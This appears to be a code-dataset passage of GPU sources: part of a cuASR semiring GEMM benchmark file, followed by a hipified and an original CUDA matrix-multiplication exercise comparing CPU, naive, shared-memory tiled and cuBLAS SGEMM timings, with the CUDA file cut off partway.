MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_16x16x1_4x2_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x32x1_4x4_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x32x1_4x4_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 2 // Threadblock: 128 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_32x16x1_4x4_8x4_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_32x16x1_4x4_8x4_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 32 x 64 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x16_8x16x1_2x2_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x16_8x16x1_2x2_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 32 x 128 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x16_8x32x1_2x4_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x16_8x32x1_2x4_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 4 // Threadblock: 64 x 32 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x16_16x8x1_2x2_8x4_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 16>; using WarpShape = cutlass::gemm::GemmShape<16, 8, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x16_16x8x1_2x2_8x4_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 4 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x16x1_4x2_4x8_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_16x16x1_4x2_4x8_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 4 x 4 // Threadblock: 128 x 32 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x16_32x8x1_4x2_8x4_4x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 16>; using WarpShape = cutlass::gemm::GemmShape<32, 8, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x16_32x8x1_4x2_8x4_4x4) ->RangeMultiplier(2)->Range(256, 4096); #endif
e5fbec3f0e75d0718662e41e7bb4a83a3261d40c.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime.h> #include <stdio.h> #include <hiprand/hiprand.h> #include <sys/time.h> #include <errno.h> #include <unistd.h> #include <rocblas.h> #include <iostream> #include <unistd.h> #ifndef TILE_SIZE #define TILE_SIZE 16 #endif #define THRESHOLD 1e-3 /* CUDA layout */ dim3 grid(1); dim3 block(TILE_SIZE, TILE_SIZE); /* from cuda samples */ void checkGpuError(hipError_t result, char const *const func, const char *const file, int const line) { if(result!=hipSuccess) { \ fprintf(stderr, "Cuda failure %s:%d: '%s'\n",__FILE__,__LINE__,hipGetErrorString(result)); exit(1); } } // This will output the proper CUDA error strings in the event // that a CUDA host call returns an error #define checkCudaErrors(val) checkGpuError((val), #val, __FILE__, __LINE__) /* https://gist.github.com/Tener/803377 */ #define CURAND_CALL(x) { \ do { \ if((x) != HIPRAND_STATUS_SUCCESS) { \ printf("Error at %s:%d\n",__FILE__,__LINE__); \ exit(1); \ } \ } while(0); \ } /* time diff in ms */ double elapsed(struct timeval t0, struct timeval t1) { return (double)(t1.tv_sec - t0.tv_sec) * 1000.0L + (double)(t1.tv_usec - t0.tv_usec) / 1000.0L; } /* compare matrix with abs difference */ void compare_matrix(float *matrix_a, float *matrix_b, long size, double threshold) { for (long i = 0; i < size*size; i++) { if (fabs((double)matrix_a[i] - (double)matrix_b[i]) > threshold) { fprintf(stderr, "Compare matrix failed: %f vs %f at i = %ld\n", matrix_a[i], matrix_b[i], i); exit(1); } } printf("Matrices equivalent \n"); } /* init matrix with hiprand */ void init_matrix(float *matrix, long size, unsigned long long seed) { float *d_matrix = NULL; hiprandGenerator_t gen; checkCudaErrors(hipMalloc(&d_matrix, sizeof(float)*size*size)); CURAND_CALL(hiprandCreateGenerator(&gen, HIPRAND_RNG_PSEUDO_DEFAULT)); CURAND_CALL(hiprandSetPseudoRandomGeneratorSeed(gen, seed)); CURAND_CALL(hiprandGenerateUniform(gen, d_matrix, size*size)); checkCudaErrors(hipMemcpy(matrix, d_matrix, sizeof(float)*size*size, hipMemcpyDeviceToHost)); checkCudaErrors(hipFree(d_matrix)); CURAND_CALL(hiprandDestroyGenerator(gen)); } /* C = AB on CPU with re-ordered loop */ void cpu_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); for (long i = 0; i < size; i++) { for (long k = 0; k < size; k++) { for (long j = 0; j < size; j++) { C[i * size + j] += A[i * size + k] * B[k * size + j]; } } } gettimeofday(&t1, NULL); printf("CPU matmul:\t\t\t%f ms\n", elapsed(t0, t1)); } /* matmul kernel with global memory */ __global__ void naive_sgemm_kernel(float *C, float *A, float *B, long size) { const long i = blockIdx.x * blockDim.x + threadIdx.x; const long j = blockIdx.y * blockDim.y + threadIdx.y; float val = 0.0; if (i >= size || j >= size) return; for (long k = 0; k < size; k++) { val += A[i * size + k] * B[k * size + j]; } C[i * size + j] += val; } /* matmul with global memory */ void naive_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); hipLaunchKernelGGL(( naive_sgemm_kernel), dim3(grid), dim3(block), 0, 0, C, A, B, size); checkCudaErrors(hipPeekAtLastError()); checkCudaErrors(hipDeviceSynchronize()); gettimeofday(&t1, NULL); printf("GPU matmul (global memory):\t%f ms\n", elapsed(t0, t1)); } /* matmul kernel with shared memory */ __global__ void shared_sgemm_kernel(float *C, float *A, float *B, long size) { const long col = blockIdx.x * blockDim.x + threadIdx.x; const long row = blockIdx.y * blockDim.y + threadIdx.y; float val = 0.0; /* TODO declare shared memory with size TILE_SIZE x TILE_SIZE */ __shared__ float tile_A[TILE_SIZE][TILE_SIZE]; __shared__ float tile_B[TILE_SIZE][TILE_SIZE]; if (col < size && row < size) { const long local_col = blockIdx.x * TILE_SIZE + threadIdx.x; const long local_row = blockIdx.y * TILE_SIZE + threadIdx.y; for (long m = 0; m < size / TILE_SIZE; ++m) { tile_A[threadIdx.y][threadIdx.x] = A[local_row * size + (m * TILE_SIZE + threadIdx.x)]; tile_B[threadIdx.y][threadIdx.x] = B[(m * TILE_SIZE + threadIdx.y) * size + local_col]; __syncthreads(); /* TODO introduce a pragma directive that can potentially improve performance here */ #pragma unroll for (long k = 0; k < TILE_SIZE; ++k) { val += tile_A[threadIdx.y][k] * tile_B[k][threadIdx.x]; /* TODO Perform multiplication here */ } __syncthreads(); } C[local_row * size + local_col] += val; } } /* matmul with shared memory */ void shared_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); hipLaunchKernelGGL(( shared_sgemm_kernel), dim3(grid), dim3(block), 0, 0, C, A, B, size); checkCudaErrors(hipPeekAtLastError()); checkCudaErrors(hipDeviceSynchronize()); gettimeofday(&t1, NULL); printf("GPU matmul (shared memory):\t%f ms\n", elapsed(t0, t1)); } /* cuBLAS */ void cublas_sgemm(float *C, float *A, float *B, long size) { //printf("Inside cublas \n"); struct timeval t0, t1; float alpha = 1.0; float beta = 0.0; //printf("dddasdasd\n"); hipblasHandle_t handle; hipblasCreate(&handle); //hipblasSetPointerMode(handle, HIPBLAS_POINTER_MODE_DEVICE); //printf("made it furtherrrr\n"); gettimeofday(&t0, NULL); /* TODO fill in the blanks, do C = BA instead of C = AB */ hipblasSgemm(handle, HIPBLAS_OP_N, HIPBLAS_OP_N, size, size, size, &alpha,B,size,A,size,&beta,C,size); checkCudaErrors(hipDeviceSynchronize()); gettimeofday(&t1, NULL); hipblasDestroy(handle); printf("GPU cuBLAS matmul:\t\t%f ms\n", elapsed(t0, t1)); } void print_usage(char *program) { fprintf(stderr, "Usage: %s [-s size] [-v to verify with CPU sgemm]\n", program); } int main(int argc, char *argv[]) { int opt; long size = 64*2*2*2*2*2; bool verify = false; while ((opt = getopt(argc, argv, "s:v")) != -1) { switch (opt) { case 's': size = atol(optarg); if (size % TILE_SIZE != 0) { fprintf(stderr, "Error: Matrix size must be a multiple of tile size %d.\n", TILE_SIZE); exit(1); } break; case 'v': verify = true; printf("Matrix size: %ldx%ld\n", size, size); break; default: print_usage(argv[0]); exit(1); } } grid = dim3(((size + (TILE_SIZE - 1)) / TILE_SIZE), ((size + (TILE_SIZE - 1)) / TILE_SIZE)); printf("Matrix size: %ldx%ld\n", size, size); printf("Grid size: %ux%u\n", grid.x, grid.y); printf("Tile size: %ux%u\n", TILE_SIZE, TILE_SIZE); printf("Run CPU sgemm: %d\n\n", verify); float *A = (float*)malloc(sizeof(float)*size*size); float *B = (float*)malloc(sizeof(float)*size*size); float *C_result = (float*)malloc(sizeof(float)*size*size); float *C_truth = (float*)malloc(sizeof(float)*size*size); float *d_A = NULL; float *d_B = NULL; float *d_C = NULL; if (A == NULL || B == NULL || C_truth == NULL || C_result == NULL) { fprintf(stderr, "Error: %s\n", strerror(errno)); exit(1); } /* initialize A and B */ init_matrix(A, size, 1); init_matrix(B, size, 5); memset(C_truth, 0, sizeof(float)*size*size); /* allocate A and B on GPU */ checkCudaErrors(hipMalloc(&d_A, sizeof(float)*size*size)); checkCudaErrors(hipMalloc(&d_B, sizeof(float)*size*size)); checkCudaErrors(hipMalloc(&d_C, sizeof(float)*size*size)); /* copy A and B to GPU */ checkCudaErrors(hipMemcpy(d_A, A, sizeof(float)*size*size, hipMemcpyHostToDevice)); checkCudaErrors(hipMemcpy(d_B, B, sizeof(float)*size*size, hipMemcpyHostToDevice)); /* host gemm */ if (verify) { cpu_sgemm(C_truth, A, B, size); } /* set C on GPU and run cublas */ checkCudaErrors(hipMemset(d_C, 0, sizeof(float)*size*size)); //printf("ASDASDASD\n"); cublas_sgemm(d_C, d_A, d_B, size); //printf("NNGNGNGNGNGN"); if (verify) { checkCudaErrors(hipMemcpy(C_result, d_C, sizeof(float)*size*size, hipMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); } else { checkCudaErrors(hipMemcpy(C_truth, d_C, sizeof(float)*size*size, hipMemcpyDeviceToHost)); } /* run naive gpu gemm */ checkCudaErrors(hipMemset(d_C, 0, sizeof(float)*size*size)); naive_sgemm(d_C, d_A, d_B, size); checkCudaErrors(hipMemcpy(C_result, d_C, sizeof(float)*size*size, hipMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); /* run shared */ checkCudaErrors(hipMemset(d_C, 0, sizeof(float)*size*size)); shared_sgemm(d_C, d_A, d_B, size); checkCudaErrors(hipMemcpy(C_result, d_C, sizeof(float)*size*size, hipMemcpyDeviceToHost)); compare_matrix(C_result, C_truth, size, THRESHOLD); /* free */ checkCudaErrors(hipFree(d_A)); checkCudaErrors(hipFree(d_B)); checkCudaErrors(hipFree(d_C)); free(A); free(B); free(C_truth); free(C_result); return 0; }
e5fbec3f0e75d0718662e41e7bb4a83a3261d40c.cu
#include <cuda.h> #include <stdio.h> #include <curand.h> #include <sys/time.h> #include <errno.h> #include <unistd.h> #include <cublas_v2.h> #include <iostream> #include <unistd.h> #ifndef TILE_SIZE #define TILE_SIZE 16 #endif #define THRESHOLD 1e-3 /* CUDA layout */ dim3 grid(1); dim3 block(TILE_SIZE, TILE_SIZE); /* from cuda samples */ void checkGpuError(cudaError_t result, char const *const func, const char *const file, int const line) { if(result!=cudaSuccess) { \ fprintf(stderr, "Cuda failure %s:%d: '%s'\n",__FILE__,__LINE__,cudaGetErrorString(result)); exit(1); } } // This will output the proper CUDA error strings in the event // that a CUDA host call returns an error #define checkCudaErrors(val) checkGpuError((val), #val, __FILE__, __LINE__) /* https://gist.github.com/Tener/803377 */ #define CURAND_CALL(x) { \ do { \ if((x) != CURAND_STATUS_SUCCESS) { \ printf("Error at %s:%d\n",__FILE__,__LINE__); \ exit(1); \ } \ } while(0); \ } /* time diff in ms */ double elapsed(struct timeval t0, struct timeval t1) { return (double)(t1.tv_sec - t0.tv_sec) * 1000.0L + (double)(t1.tv_usec - t0.tv_usec) / 1000.0L; } /* compare matrix with abs difference */ void compare_matrix(float *matrix_a, float *matrix_b, long size, double threshold) { for (long i = 0; i < size*size; i++) { if (fabs((double)matrix_a[i] - (double)matrix_b[i]) > threshold) { fprintf(stderr, "Compare matrix failed: %f vs %f at i = %ld\n", matrix_a[i], matrix_b[i], i); exit(1); } } printf("Matrices equivalent \n"); } /* init matrix with curand */ void init_matrix(float *matrix, long size, unsigned long long seed) { float *d_matrix = NULL; curandGenerator_t gen; checkCudaErrors(cudaMalloc(&d_matrix, sizeof(float)*size*size)); CURAND_CALL(curandCreateGenerator(&gen, CURAND_RNG_PSEUDO_DEFAULT)); CURAND_CALL(curandSetPseudoRandomGeneratorSeed(gen, seed)); CURAND_CALL(curandGenerateUniform(gen, d_matrix, size*size)); checkCudaErrors(cudaMemcpy(matrix, d_matrix, sizeof(float)*size*size, cudaMemcpyDeviceToHost)); checkCudaErrors(cudaFree(d_matrix)); CURAND_CALL(curandDestroyGenerator(gen)); } /* C = AB on CPU with re-ordered loop */ void cpu_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); for (long i = 0; i < size; i++) { for (long k = 0; k < size; k++) { for (long j = 0; j < size; j++) { C[i * size + j] += A[i * size + k] * B[k * size + j]; } } } gettimeofday(&t1, NULL); printf("CPU matmul:\t\t\t%f ms\n", elapsed(t0, t1)); } /* matmul kernel with global memory */ __global__ void naive_sgemm_kernel(float *C, float *A, float *B, long size) { const long i = blockIdx.x * blockDim.x + threadIdx.x; const long j = blockIdx.y * blockDim.y + threadIdx.y; float val = 0.0; if (i >= size || j >= size) return; for (long k = 0; k < size; k++) { val += A[i * size + k] * B[k * size + j]; } C[i * size + j] += val; } /* matmul with global memory */ void naive_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); naive_sgemm_kernel<<<grid, block>>>(C, A, B, size); checkCudaErrors(cudaPeekAtLastError()); checkCudaErrors(cudaDeviceSynchronize()); gettimeofday(&t1, NULL); printf("GPU matmul (global memory):\t%f ms\n", elapsed(t0, t1)); } /* matmul kernel with shared memory */ __global__ void shared_sgemm_kernel(float *C, float *A, float *B, long size) { const long col = blockIdx.x * blockDim.x + threadIdx.x; const long row = blockIdx.y * blockDim.y + threadIdx.y; float val = 0.0; /* TODO declare shared memory with size TILE_SIZE x TILE_SIZE */ __shared__ float tile_A[TILE_SIZE][TILE_SIZE]; __shared__ float tile_B[TILE_SIZE][TILE_SIZE]; if (col < size && row < size) { const long local_col = blockIdx.x * TILE_SIZE + threadIdx.x; const long local_row = blockIdx.y * TILE_SIZE + threadIdx.y; for (long m = 0; m < size / TILE_SIZE; ++m) { tile_A[threadIdx.y][threadIdx.x] = A[local_row * size + (m * TILE_SIZE + threadIdx.x)]; tile_B[threadIdx.y][threadIdx.x] = B[(m * TILE_SIZE + threadIdx.y) * size + local_col]; __syncthreads(); /* TODO introduce a pragma directive that can potentially improve performance here */ #pragma unroll for (long k = 0; k < TILE_SIZE; ++k) { val += tile_A[threadIdx.y][k] * tile_B[k][threadIdx.x]; /* TODO Perform multiplication here */ } __syncthreads(); } C[local_row * size + local_col] += val; } } /* matmul with shared memory */ void shared_sgemm(float *C, float *A, float *B, long size) { struct timeval t0, t1; gettimeofday(&t0, NULL); shared_sgemm_kernel<<<grid, block>>>(C, A, B, size); checkCudaErrors(cudaPeekAtLastError()); checkCudaErrors(cudaDeviceSynchronize()); gettimeofday(&t1, NULL); printf("GPU matmul (shared memory):\t%f ms\n", elapsed(t0, t1)); } /* cuBLAS */ void cublas_sgemm(float *C, float *A, float *B, long size) { //printf("Inside cublas \n"); struct timeval t0, t1; float alpha = 1.0; float beta = 0.0; //printf("dddasdasd\n"); cublasHandle_t handle; cublasCreate(&handle); //cublasSetPointerMode(handle, CUBLAS_POINTER_MODE_DEVICE); //printf("made it furtherrrr\n"); gettimeofday(&t0, NULL); /* TODO fill in the blanks, do C = BA instead of C = AB */ cublasSgemm(handle, CUBLAS_OP_N, CUBLAS_OP_N, size, size, size, &alpha,B,size,A,size,&beta,C,size); checkCudaErrors(cudaDeviceSynchronize()); gettimeofday(&t1, NULL); cublasDestroy(handle); printf("GPU cuBLAS matmul:\t\t%f ms\n", elapsed(t0, t1)); } void print_usage(char *program) { fprintf(stderr, "Usage: %s [-s size] [-v to verify with CPU sgemm]\n", program); } int main(int argc, char *argv[]) { int opt; long size = 64*2*2*2*2*2; bool verify = false; while ((opt = getopt(argc, argv, "s:v")) != -1) { switch (opt) { case 's': size = atol(optarg); if (size % TILE_SIZE != 0) { fprintf(stderr, "Error: Matrix size must be a multiple of tile size %d.\n", TILE_SIZE); exit(1); } break; case 'v': verify = true; printf("Matrix size: %ldx%ld\n", size, size); break; default: print_usage(argv[0]); exit(1); } } grid = dim3(((size + (TILE_SIZE - 1)) / TILE_SIZE), ((size + (TILE_SIZE - 1)) / TILE_SIZE)); printf("Matrix size: %ldx%ld\n", size, size); printf("Grid size: %ux%u\n", grid.x, grid.y); printf("Tile size: %ux%u\n", TILE_SIZE, TILE_SIZE); printf("Run CPU sgemm: %d\n\n", verify); float *A = (float*)malloc(sizeof(float)*size*size); float *B = (float*)malloc(sizeof(float)*size*size); float *C_result = (float*)malloc(sizeof(float)*size*size); float *C_truth = (float*)malloc(sizeof(float)*size*size); float *d_A = NULL; float *d_B = NULL; float *d_C = NULL; if (A == NULL || B == NULL || C_truth == NULL || C_result == NULL) { fprintf(stderr, "Error: %s\n", strerror(errno)); exit(1); } /* initialize A and B */ init_matrix(A, size, 1); init_matrix(B, size, 5); memset(C_truth, 0, sizeof(float)*size*size); /* allocate A and B on GPU */ checkCudaErrors(cudaMalloc(&d_A, sizeof(float)*size*size)); checkCudaErrors(cudaMalloc(&d_B, sizeof(float)*size*size)); 